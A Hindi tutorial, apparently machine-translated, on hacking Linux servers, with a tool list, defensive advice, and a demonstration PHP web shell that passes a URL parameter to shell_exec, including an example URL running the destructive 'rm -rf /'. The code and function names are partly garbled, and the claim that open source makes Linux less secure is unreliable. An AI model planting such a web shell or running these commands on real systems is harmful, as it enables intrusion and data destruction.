हैकिंग लिनक्स ओएस: उबंटू (कमांड्स ट्यूटोरियल) के साथ हैकिंग

विषय - सूची:

Anonim

लिनक्स विशेष रूप से वेब सर्वर के लिए सबसे व्यापक रूप से इस्तेमाल किया जाने वाला सर्वर ऑपरेटिंग सिस्टम है। यह खुला स्रोत है; इसका मतलब है कि किसी के पास स्रोत कोड तक पहुंच हो सकती है। यह अन्य ऑपरेटिंग सिस्टम की तुलना में इसे कम सुरक्षित बनाता है क्योंकि हमलावर कमजोरियों को खोजने के लिए स्रोत कोड का अध्ययन कर सकते हैं । हैकर्स के लिए लिनक्स एक सिस्टम पर अनधिकृत पहुंच प्राप्त करने के लिए इन कमजोरियों का शोषण करने के बारे में है।

इस लेख में, हम आपको बताएंगे कि लिनक्स क्या है, इसकी सुरक्षा कमजोरियां, उबंटू के साथ हैकिंग और आपके द्वारा लगाए जाने वाले काउंटर उपाय।

इस ट्यूटोरियल में शामिल विषय

  • लिनक्स पर त्वरित नोट
  • लिनक्स हैकिंग उपकरण
  • लिनक्स हैक को कैसे रोकें
  • हैकिंग गतिविधि: PHP का उपयोग करके एक लिनक्स सिस्टम हैक

लिनक्स पर त्वरित नोट

लिनक्स एक ओपन सोर्स ऑपरेटिंग सिस्टम है । लिनक्स आधारित ऑपरेटिंग सिस्टम के कई वितरण हैं जैसे कि Redhat, Fedora, और Ubuntu, आदि। अन्य ऑपरेटिंग सिस्टम के विपरीत, लिनक्स सुरक्षा के लिए कम सुरक्षित है। ऐसा इसलिए है क्योंकि स्रोत कोड स्वतंत्र रूप से उपलब्ध है, इसलिए कमजोरियों के लिए इसका अध्ययन करना आसान है और अन्य ऑपरेटिंग सिस्टमों की तुलना में उनका शोषण करना है जो खुले स्रोत नहीं हैं। लिनक्स को सर्वर, डेस्कटॉप, टैबलेट या मोबाइल डिवाइस ऑपरेटिंग सिस्टम के रूप में इस्तेमाल किया जा सकता है।

लिनक्स प्रोग्राम जीयूआई या कमांड का उपयोग करके संचालित किया जा सकता है। जीयूआई का उपयोग करने की तुलना में काली लिनक्स हैकिंग के लिए लिनक्स कमांड अधिक प्रभावी और कुशल हैं। इस कारण से, यह हैकिंग के लिए बुनियादी लिनक्स कमांड्स को जानने में मदद करता है।

इन ट्यूटोरियल्स का संदर्भ लें https://www.guru99.com/unix-linux-tutorial.html, जिस पर काली लिनक्स हैक के साथ शुरुआत की जा सकती है।

लिनक्स हैकिंग उपकरण

  • नेसस - इस टूल का उपयोग उबंटू हैक, स्कैन कॉन्फ़िगरेशन सेटिंग्स, पैच और नेटवर्क आदि के लिए किया जा सकता है। इसे https://www.tenable.com/products/nessus पर पाया जा सकता है।
  • NMap। इस उपकरण का उपयोग उन होस्ट्स पर नजर रखने के लिए किया जा सकता है जो सर्वर और उन सेवाओं का उपयोग कर रहे हैं जिनका वे उपयोग कर रहे हैं। यह बंदरगाहों के लिए स्कैन करने के लिए भी इस्तेमाल किया जा सकता है। यह https://nmap.org/ पर पाया जा सकता है
  • SARA - SARA सिक्योरिटी ऑडिटर के रिसर्च असिस्टेंट के लिए संक्षिप्त नाम है। जैसा कि नाम से ही स्पष्ट है, इस उपकरण का उपयोग SQL इंजेक्शन, XSS आदि खतरों के खिलाफ नेटवर्क का ऑडिट करने के लिए किया जा सकता है। इसे http://www-arc.com/sara/sara.html पर पाया जा सकता है।

उपरोक्त सूची संपूर्ण नहीं है; यह आपको उबंटू हैकिंग और लिनक्स सिस्टम को हैक करने के लिए उपलब्ध उपकरणों का अंदाजा देता है।

लिनक्स हैक को कैसे रोकें

लिनक्स हैकिंग ऑपरेटिंग सिस्टम में कमजोरियों का फायदा उठाता है। एक संगठन इस तरह के हमलों के खिलाफ खुद को बचाने के लिए निम्न नीति अपना सकता है।

  • पैच प्रबंधन - पैच बग को ठीक करता है जो हमलावर सिस्टम से समझौता करने के लिए शोषण करते हैं। एक अच्छी पैच मैनेजमेंट पॉलिसी यह सुनिश्चित करेगी कि आप अपने सिस्टम में लगातार प्रासंगिक पैच लागू करें।
  • उचित ओएस कॉन्फ़िगरेशन - अन्य कारनामे सर्वर के कॉन्फ़िगरेशन में कमजोरियों का लाभ उठाते हैं। निष्क्रिय उपयोगकर्ता नाम और डेमॉन अक्षम होना चाहिए। सामान्य सेटिंग्स जैसे एप्लिकेशन के लिए डिफ़ॉल्ट सेटिंग्स, डिफ़ॉल्ट उपयोगकर्ता नाम और कुछ पोर्ट नंबर को बदलना चाहिए।
  • घुसपैठ का पता लगाने प्रणाली - इस तरह के उपकरणों का उपयोग सिस्टम में अनधिकृत पहुंच का पता लगाने के लिए किया जा सकता है। कुछ उपकरणों में ऐसे हमलों का पता लगाने और उन्हें रोकने की क्षमता होती है।

हैकिंग गतिविधि: एक उबंटू लिनक्स सिस्टम को PHP का उपयोग करके हैक करें

इस व्यावहारिक परिदृश्य में, हम सीखेंगे कि उबंटू के साथ कैसे हैक किया जाए और हम आपको लिनक्स पर समझौता करने के लिए PHP का उपयोग कैसे कर सकते हैं, इस बारे में बुनियादी जानकारी प्रदान करेंगे। हम किसी पीड़ित को निशाना नहीं बनाने जा रहे हैं। यदि आप इसे आज़माना चाहते हैं, तो आप अपने स्थानीय मशीन पर LAMPP स्थापित कर सकते हैं।

PHP दो फ़ंक्शन के साथ आता है जिसका उपयोग लिनक्स हैकिंग कमांड को निष्पादित करने के लिए किया जा सकता है। इसका क्रियान्वयन () और शेल_सेक्स () फ़ंक्शन है। फ़ंक्शन निष्पादन () कमांड आउटपुट की अंतिम पंक्ति देता है, जबकि शेल_एक्सेस () कमांड के पूरे परिणाम को एक स्ट्रिंग के रूप में लौटाता है।

प्रदर्शन उद्देश्यों के लिए, आइए हमलावर प्रबंधकों को वेब सर्वर पर निम्न फ़ाइल अपलोड करने के लिए मान लें।

 $cmd
";$output = shell_exec($cmd);echo "
$output
";?>

यहां,

उपरोक्त लिपि को cmd नामक GET वैरिएबल से कमांड मिलती है। कमांड को shell_exec () और ब्राउज़र में दिए गए परिणामों का उपयोग करके निष्पादित किया जाता है।

उपरोक्त URL का उपयोग करके उपरोक्त कोड का उपयोग किया जा सकता है

http: //localhost/cp/konsole.php? cmd = ls% 20-l

यहां,

  • "... konsole.php? Cmd = ls% 20-l" वैरिएबल cmd को मान ls -l प्रदान करता है

सर्वर के खिलाफ हैकिंग के लिए उबंटू में कमांड के रूप में निष्पादित किया जाएगा

shell_exec('ls -l') ;

एक वेब सर्वर पर उपरोक्त कोड को निष्पादित करने से निम्नलिखित के समान परिणाम मिलते हैं।

उपरोक्त कमांड केवल वर्तमान निर्देशिका और अनुमतियों में फाइलें प्रदर्शित करता है

मान लीजिए कि हमलावर निम्नलिखित कमांड को पास करता है

rm -rf /

यहां,

  • "आरएम" फ़ाइलों को हटा देता है
  • "Rf" rm कमांड को एक पुनरावर्ती मोड में चलाता है। सभी फ़ोल्डर्स और फ़ाइलों को हटाना
  • "/" कमांड को रूट डायरेक्टरी से फाइल डिलीट करने का निर्देश देता है

आक्रमण URL कुछ इस तरह दिखाई देगा

http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /

सारांश

  • लिनक्स सर्वर, डेस्कटॉप, टैबलेट और मोबाइल उपकरणों के लिए एक लोकप्रिय ऑपरेटिंग सिस्टम है।
  • लिनक्स खुला स्रोत है, और स्रोत कोड किसी के द्वारा प्राप्त किया जा सकता है। इससे कमजोरियों को दूर करना आसान हो जाता है। यह हैकर्स के लिए सबसे अच्छे ओएस में से एक है।
  • उबंटू में बेसिक और नेटवर्किंग हैकिंग कमांड लिनक्स हैकर्स के लिए मूल्यवान हैं।
  • कमजोरियाँ एक ऐसी कमजोरी है जिसका किसी प्रणाली से समझौता करने के लिए शोषण किया जा सकता है।
  • एक अच्छी सुरक्षा एक सिस्टम को एक हमलावर द्वारा समझौता करने से बचाने में मदद कर सकती है।